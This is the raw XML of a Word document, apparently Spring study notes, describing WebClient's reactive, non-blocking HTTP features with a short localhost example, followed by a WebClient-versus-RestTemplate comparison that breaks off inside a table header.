      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353FF6B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allowing the application to issue HTTP requests and handle responses using reactive types such a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This allows efficient handling of large volumes of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E86D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HTTP Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC80D9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can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all HTTP method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etc., and it can also manage request headers, request bodies, query parameters, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BEFB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osability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B02D6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highly composable. You can chain operations together using reactive operators. For example, you can transform the response data or handle errors in a fluent way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAB2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Different Data Formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E35135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can be used to interact with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that use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON</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XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or any other data formats. It integrates with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jacks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Gson</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for JSON processing and supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JAXB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for XML processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153342C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 Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A94934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Spring WebFlux is built on reactive programming concepts,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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1573E09F"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supports built-in error handling. You can easily define error handling logic (such as retry logic or fallbacks) when HTTP requests fail, making it robust for production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197CE2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AC8FA"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supports </w:t>
      </w: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 For large responses or files (like downloading large data), WebClient can read the data in chunks without blocking the application, making it efficient for such use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD15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oss-Service Communication in Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4AB0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often used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for making non-blocking HTTP calls to other services. Its asynchronous and non-blocking nature makes it suitable for communicating with other microservices efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1A240"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Using WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A5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197CE3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72F6A41" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210C1C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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF23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21F222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Client webClient = WebClient.create("http://localhost:8080");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121332D" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B540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response = webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31796C8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A468AE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 the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4BC1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 response to Mono&lt;String&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38557417" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41536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to execute the request asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC18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sponse.subscribe(System.out::println);  // Print the response when it is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB232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6F55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357EAB"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 of WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45495D4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Makes non-blocking requests, allowing other tasks to proceed while waiting for the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B7F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ent API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The builder pattern makes it easy to configure and chain method calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A61E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formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It supports multiple response formats (JSON, XML, etc.) through built-in converters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E42AB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Provides rich error handling capabilities with the use of reactive operators like onErrorResume, onErrorMap, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53467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Allows setting timeouts for the requests, handling cases where the server takes too long to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089042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It can handle large response bodies by streaming them to avoid memory overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3371A3A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s for WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A073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icroservices communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For making HTTP requests to other services in a microservices architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C89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racting with external APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Calling third-party RESTful services in a reactive and non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A3E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large data streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fetching large files or continuous data streams like log files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1FA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Web Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When building a web application with Spring WebFlux that needs to make HTTP calls in a non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245E6F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RestTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA21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Blocking I/O, generally used in traditional Spring MVC applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2C89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Non-blocking, used in reactive Spring WebFlux applications for handling asynchronous HTTP calls efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F72EF0"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2FBDE7">
          <v:rect id="_x0000_i2297" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D089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key component in Spring WebFlux for making </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking HTTP requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It plays a critical role in building </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive, scalable applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by allowing asynchronous communication with other systems or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1921E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98" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C218D1F" w14:textId="30DD9D29" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00281739" w:rsidP="00163F3B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="522" w:name="_Toc197867736"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="004A4102" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">WebClient </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="004A4102" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> RestTemplate</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p w14:paraId="32ECE9F1" w14:textId="6A78D588"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ain differences between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Spring are related to their nature (synchronous vs asynchronous), usage context, and the way they handle HTTP requests. Here's a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D79F0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Blocking vs Non-Blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFC15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10D0A59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It uses a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approach for making HTTP requests. The thread that calls RestTemplate is blocked until the response is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C60A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When you make an HTTP request using RestTemplate, it will block the thread until it gets the response, which can lead to resource wastage, especially in high-concurrency situations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4AA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72C453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meaning that the thread is not blocked while waiting for the response. The operation returns a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which are reactive types in Project Reactor), and you can continue with other tasks while waiting for the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCD37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You can use WebClient to perform HTTP calls without blocking the thread, allowing other tasks to proceed concurrently, improving performance and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A61D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e Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0459341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6D2FA01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imarily used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traditional Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications that do not require asynchronous processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E18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HTTP requests, where blocking behavior is acceptable, and the application is not handling large numbers of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389FE27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8BFA6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6464D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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-concurrency scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and applications that need to scale well, such as microservices or systems that consume a large number of API calls concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757D066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Simplicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586BCB7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3A69DF5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imple and easy to use for standard, synchronous HTTP calls. It has been the default HTTP client for many years in Spring-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAAB6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522EADB0"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lightly more complex due to its reactive nature and its use of the reactive programming paradigm. However, it is more suitable for handling asynchronous requests and works well with Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CA248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 Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE86F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C033E3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blocking, it uses a new thread for each request. This can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread exhaustion</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in high-load systems with many concurrent requests, reducing scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037651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D23169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uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive thread pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle requests asynchronously. This means it can handle many more concurrent requests without exhausting threads, which leads to better scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76276C0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rror Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6169725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2555177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exception handling is used, and it is blocking, so you may have to deal with timeouts or retries in a synchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C71836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39CBAE9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ovides advanced error handling with </w:t>
      </w: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 such as onErrorResume, onErrorMap, etc., allowing you to handle failures in a more flexible and non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6717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Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C819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FB3FB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 not natively support streaming large responses (e.g., downloading large files) without blocking the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BCD8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5D5CE7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large responses or reading data in chunks. This is ideal when dealing with large files or continuous data, as it doesn't block the calling thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565DB811"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Deprecation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646B37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02B9D2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ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring 5 and marked as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"no longer actively developed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring WebFlux-based applications. While still functional, it is no longer recommended for new projects, especially in applications that require asynchronous or reactive programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438BA2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F4B6ED3"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recommended</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach for making HTTP requests in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and is expected to be the standard HTTP client moving forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE75D0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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8E79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308F35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for low-concurrency applications or small systems where synchronous behavior is fine. It can have performance bottlenecks when handling many concurrent requests due to thread blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CB4C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A5F7A5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ffers better performance in high-concurrency situations because it is non-blocking and can handle more requests concurrently with fewer threads, making it more scalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5B38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upport for Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625927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A70621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t designed to support reactive streams or asynchronous handling. It works synchronously with HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1470DF4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49331FE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ully support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Mono and Flux from Project Reactor), which allows you to compose asynchronous requests, apply backpressure, and handle large datasets efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B55A4"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API Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF154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7848C5C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traditional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API, with methods like getForObject(), postForObject(), exchange(), etc., that block until a response is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD972D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3165C8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w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, supporting methods like get(), post(), retrieve(), and exchange() that return reactive types (Mono, Flux), allowing you to chain operations and process responses asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE834AE"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7614F">
          <v:rect id="_x0000_i2299" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639D34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485"/>
        <w:gridCol w:w="4942"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1FA05241" w14:textId="77777777" w:rsidTr="00E32D56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736BED8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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E83B1C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stTemplate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D48DF02"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ebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
